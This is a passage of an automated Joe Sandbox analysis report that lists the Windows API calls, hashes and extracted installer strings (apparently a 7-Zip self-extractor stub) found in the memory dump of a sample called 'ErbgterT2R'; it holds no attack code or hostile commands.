                                                                                            • Opcode ID: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                                                                            • Instruction ID: 08c73d75f8249df6a552952f3d33af28cabbedea74541c6d0cfd8ce2793c0c4e
                                                                                            • Opcode Fuzzy Hash: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                                                                            • Instruction Fuzzy Hash: C7417C71A00218BFCB11DFA1DC49DEEBF7DEF08742B008076FA05A61A0DB758A41DB68
                                                                                            APIs
                                                                                              • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                                                              • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                                                            • GetDlgItem.USER32(?,000004B8), ref: 0040816A
                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408179
                                                                                            • GetDlgItem.USER32(?,000004B5), ref: 004081C0
                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 004081C5
                                                                                            • GetDlgItem.USER32(?,000004B5), ref: 004081D5
                                                                                            • SetWindowLongW.USER32(00000000), ref: 004081D8
                                                                                            • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 004081FE
                                                                                            • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408210
                                                                                            • GetDlgItem.USER32(?,000004B4), ref: 0040821A
                                                                                            • SetFocus.USER32(00000000), ref: 0040821D
                                                                                            • SetTimer.USER32(?,00000001,00000000,00000000), ref: 0040824C
                                                                                            • CoCreateInstance.OLE32(00414C34,00000000,00000001,00414808,00000000), ref: 00408277
                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00408294
                                                                                            • IsWindow.USER32(00000000), ref: 00408297
                                                                                            • GetDlgItem.USER32(?,00000002), ref: 004082A7
                                                                                            • EnableWindow.USER32(00000000), ref: 004082AA
                                                                                            • GetDlgItem.USER32(?,000004B5), ref: 004082BE
                                                                                            • ShowWindow.USER32(00000000), ref: 004082C1
                                                                                              • Part of subcall function 00407134: GetDlgItem.USER32(?,000004B6), ref: 00407142
                                                                                              • Part of subcall function 00407B33: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
                                                                                              • Part of subcall function 00407B33: GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                                                                                              • Part of subcall function 00407B33: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                                                                                              • Part of subcall function 00407B33: wsprintfW.USER32 ref: 00407BBB
                                                                                              • Part of subcall function 00407B33: ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
                                                                                              • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                                                              • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                                                                              • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                                                              • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                                                              • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                                                              • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                                                                              • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                                                              • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                                                              • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                                                                              • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: Item$Window$MessageSend$System$EnableHandleLoadLongMenuMetricsModuleShow$??3@CreateFocusIconImageInstanceTimerUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                                            • String ID:
                                                                                            • API String ID: 855516470-0
                                                                                            • Opcode ID: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                                                                            • Instruction ID: 3ce0214ef3d03b0ee840dd4ab9c121ae631e901bc0d6870238ad5b6e85178a64
                                                                                            • Opcode Fuzzy Hash: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                                                                            • Instruction Fuzzy Hash: 014174B0644748ABDA206F65DD49F5B7BADEB40B05F00847DF552A62E1CB79B800CA1C
                                                                                            APIs
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,hAA,00000000), ref: 004030F6
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,hAA,00000000), ref: 004030FE
                                                                                            • strncmp.MSVCRT ref: 004031F1
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00403255
                                                                                            • lstrcmpW.KERNEL32(?,SetEnvironment,00000000), ref: 00403273
                                                                                            • ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@$lstrcmpstrncmp
                                                                                            • String ID: GUIFlags$MiscFlags$SetEnvironment$hAA${\rtf
                                                                                            • API String ID: 2881732429-172299233
                                                                                            • Opcode ID: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
                                                                                            • Instruction ID: da55d09168dcf28f6e950782b6654b171f18f9ca5632fa18d2c46afc5d57570a
                                                                                            • Opcode Fuzzy Hash: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
                                                                                            • Instruction Fuzzy Hash: 23819D31900218ABDF11DFA1CD55BEE7B78AF14305F1040ABE8017B2E6DB78AB05DB59
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000004B3), ref: 00406A69
                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00406A6E
                                                                                            • GetDlgItem.USER32(?,000004B4), ref: 00406AA5
                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00406AAA
                                                                                            • GetSystemMetrics.USER32(00000010), ref: 00406B0B
                                                                                            • GetSystemMetrics.USER32(00000011), ref: 00406B11
                                                                                            • GetSystemMetrics.USER32(00000008), ref: 00406B18
                                                                                            • GetSystemMetrics.USER32(00000007), ref: 00406B1F
                                                                                            • GetParent.USER32(?), ref: 00406B43
                                                                                            • GetClientRect.USER32(00000000,?), ref: 00406B55
                                                                                            • ClientToScreen.USER32(?,?), ref: 00406B68
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00406BCE
                                                                                            • GetClientRect.USER32(?,?), ref: 00406C55
                                                                                            • ClientToScreen.USER32(?,?), ref: 00406B71
                                                                                              • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                                                                            • GetSystemMetrics.USER32(00000008), ref: 00406CD6
                                                                                            • GetSystemMetrics.USER32(00000007), ref: 00406CDD
                                                                                              • Part of subcall function 00406A18: GetDlgItem.USER32(?,?), ref: 00406A36
                                                                                              • Part of subcall function 00406A18: SetWindowPos.USER32(00000000), ref: 00406A3D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                                                                            • String ID:
                                                                                            • API String ID: 747815384-0
                                                                                            • Opcode ID: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
                                                                                            • Instruction ID: 701d8c843d4ec3579feae24e97f284edc15b0bac0439a5efdbaa5111af673c9b
                                                                                            • Opcode Fuzzy Hash: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
                                                                                            • Instruction Fuzzy Hash: 7B912D71A00209AFDB14DFB9CD85AEEB7F9EF48704F148529E642F6290D778E9008B64
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                                                            • LoadIconW.USER32(00000000), ref: 00407D33
                                                                                            • GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                                                            • GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                                                            • LoadImageW.USER32(00000000), ref: 00407D54
                                                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                                                            • SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                                                            • GetWindow.USER32(?,00000005), ref: 00407E76
                                                                                            • GetWindow.USER32(?,00000005), ref: 00407E92
                                                                                            • GetWindow.USER32(?,00000005), ref: 00407EAA
                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,0040803E), ref: 00407F0A
                                                                                            • LoadIconW.USER32(00000000), ref: 00407F0D
                                                                                            • GetDlgItem.USER32(?,000004B1), ref: 00407F28
                                                                                            • SendMessageW.USER32(00000000), ref: 00407F2F
                                                                                              • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                                                                                              • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                                                                                              • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                                                              • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$HandleItemLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                                                                                            • String ID:
                                                                                            • API String ID: 1889686859-0
                                                                                            • Opcode ID: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
                                                                                            • Instruction ID: b6a50195b8a608de49edc5b96f3e83ee8a9b90890169e94b1220211b89b9884f
                                                                                            • Opcode Fuzzy Hash: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
                                                                                            • Instruction Fuzzy Hash: E861D47064C7096AE9257B61DC4AF3B3699AB40B05F10447FF642B92D2DBBCBC0056AF
                                                                                            APIs
                                                                                            • GetParent.USER32(?), ref: 00406F45
                                                                                            • GetWindowLongW.USER32(00000000), ref: 00406F4C
                                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 00406F62
                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 00406F7F
                                                                                            • GetSystemMetrics.USER32(00000031), ref: 00406F91
                                                                                            • GetSystemMetrics.USER32(00000032), ref: 00406F98
                                                                                            • GetWindowDC.USER32(?), ref: 00406FAA
                                                                                            • GetWindowRect.USER32(?,?), ref: 00406FB7
                                                                                            • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 00406FEB
                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00406FF3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                                                                            • String ID:
                                                                                            • API String ID: 2586545124-0
                                                                                            • Opcode ID: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
                                                                                            • Instruction ID: b1ff7c23223d170b9333fa97acec74f2c9230ee3eabfe87d0be763292bfdf634
                                                                                            • Opcode Fuzzy Hash: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
                                                                                            • Instruction Fuzzy Hash: 8E210C7650021ABFCF01AFA8DD48DDF7F69FB08351F008565FA15E21A0C775EA209B64
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000004B3), ref: 0040678E
                                                                                            • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067A1
                                                                                            • GetDlgItem.USER32(?,000004B4), ref: 004067AB
                                                                                            • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067B3
                                                                                            • SendMessageW.USER32(?,00000401,?,00000000), ref: 004067C3
                                                                                            • GetDlgItem.USER32(?,?), ref: 004067CC
                                                                                            • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 004067D4
                                                                                            • GetDlgItem.USER32(?,?), ref: 004067DD
                                                                                            • SetFocus.USER32(00000000,?,000004B4,74DF0E50,00407E06,000004B4,000004B3,00000000,000004B4,00000000,000004B2,?,000004B7), ref: 004067E0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemMessageSend$Focus
                                                                                            • String ID:
                                                                                            • API String ID: 3946207451-0
                                                                                            • Opcode ID: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                                                                                            • Instruction ID: e7a8c5b21de344c7c4c5496bf688f1d5cc3ba414acf11b32f4788b893cc62525
                                                                                            • Opcode Fuzzy Hash: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                                                                                            • Instruction Fuzzy Hash: 6FF04F712403087BEA212B61DD86F5BBA6EEF81B45F018425F340650F0CBF7EC109A28
                                                                                            APIs
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0040C603
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@
                                                                                            • String ID: IA$IA$IA$IA$IA$IA
                                                                                            • API String ID: 613200358-3743982587
                                                                                            • Opcode ID: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
                                                                                            • Instruction ID: 4cebfcab61734def35128a955d6a3e34031d8899c11ca8f9bd2aeb72941b6852
                                                                                            • Opcode Fuzzy Hash: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
                                                                                            • Instruction Fuzzy Hash: D2221671900248DFCB24EF65C8D09EEBBB5FF48304F50852EE91AA7291DB38A945CF58
                                                                                            APIs
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,00417788,00000000,SetEnvironment), ref: 00408479
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@
                                                                                            • String ID: BeginPrompt$ErrorTitle$FinishMessage$HelpText$SetEnvironment$WarningTitle
                                                                                            • API String ID: 613200358-994561823
                                                                                            • Opcode ID: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
                                                                                            • Instruction ID: 5566f9f9667118f06bc812855c9affabb63102f3a10b3971892d5eca1131561f
                                                                                            • Opcode Fuzzy Hash: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
                                                                                            • Instruction Fuzzy Hash: CA51D47080420AAACF24AB559E85AFB7774EB20348F54443FF881722E1EF7D5D82D64E
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(?,00417410,00000160), ref: 00406DD1
                                                                                            • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00406DF0
                                                                                            • GetDC.USER32(00000000), ref: 00406DFB
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00406E07
                                                                                            • MulDiv.KERNEL32(?,00000048,00000000), ref: 00406E16
                                                                                            • ReleaseDC.USER32(00000000,?), ref: 00406E24
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00406E4C
                                                                                            • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_0000667A), ref: 00406E81
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                                                                                            • String ID:
                                                                                            • API String ID: 2693764856-0
                                                                                            • Opcode ID: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
                                                                                            • Instruction ID: b2c1943609947f3a034a1f42a4fd453b3666a2b5c4d4ccfd9a1c2059c5c1cb6f
                                                                                            • Opcode Fuzzy Hash: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
                                                                                            • Instruction Fuzzy Hash: C32184B5500218BFDB215F61DC45EEB7B7CFB08746F0040B6F609A1190D7748E948B65
                                                                                            APIs
                                                                                            • GetDC.USER32(?), ref: 0040696E
                                                                                            • GetSystemMetrics.USER32(0000000B), ref: 0040698A
                                                                                            • GetSystemMetrics.USER32(0000003D), ref: 00406993
                                                                                            • GetSystemMetrics.USER32(0000003E), ref: 0040699B
                                                                                            • SelectObject.GDI32(?,?), ref: 004069B8
                                                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004069D3
                                                                                            • SelectObject.GDI32(?,?), ref: 004069F9
                                                                                            • ReleaseDC.USER32(?,?), ref: 00406A08
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                                                            • String ID:
                                                                                            • API String ID: 2466489532-0
                                                                                            • Opcode ID: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
                                                                                            • Instruction ID: 7c755332e1b278278a0584394201b19561512224090c74d51841a9ad660c27ee
                                                                                            • Opcode Fuzzy Hash: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
                                                                                            • Instruction Fuzzy Hash: 6B216871900209EFCB119F65DD84A8EBFF4EF08321F10C46AE559A72A0C7359A50DF40
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
• GetDlgItem.USER32(?,000004B8), ref: 00407B8B
• SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
• wsprintfW.USER32 ref: 00407BBB
• ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
Strings
Memory Dump Source
• Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
• String ID: %d%%
• API String ID: 3753976982-1518462796
APIs
• lstrlenW.KERNEL32(hAA,00000020,?,?,00405838,?,?,?,00000000,?), ref: 004040A4
  • Part of subcall function 00401A85: CharUpperW.USER32(?,74DEE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
  • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404156
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040415E
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040416D
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404175
Strings
Memory Dump Source
• Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ??3@$CharUpper$lstrlen
• String ID: hAA
• API String ID: 2587799592-1362906312
APIs
• ??3@YAXPAX@Z.MSVCRT(?,00000000,00000001,00000000,00000000,00000001,?,00000000), ref: 00404D3E
• ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DA0
• ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DB8
  • Part of subcall function 00403354: lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
  • Part of subcall function 00403354: GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
  • Part of subcall function 00403354: GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
  • Part of subcall function 00403354: ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ??3@$FileTime$AttributesSystemlstrlen
• String ID: 03A$;!@Install@!UTF-8!$;!@InstallEnd@!
• API String ID: 4038993085-2279431206
APIs
• EndDialog.USER32(?,00000000), ref: 00407579
• KillTimer.USER32(?,00000001), ref: 0040758A
• SetTimer.USER32(?,00000001,00000000,00000000), ref: 004075B4
• SuspendThread.KERNEL32(0000029C), ref: 004075CD
• ResumeThread.KERNEL32(0000029C), ref: 004075EA
• EndDialog.USER32(?,00000000), ref: 0040760C
Memory Dump Source
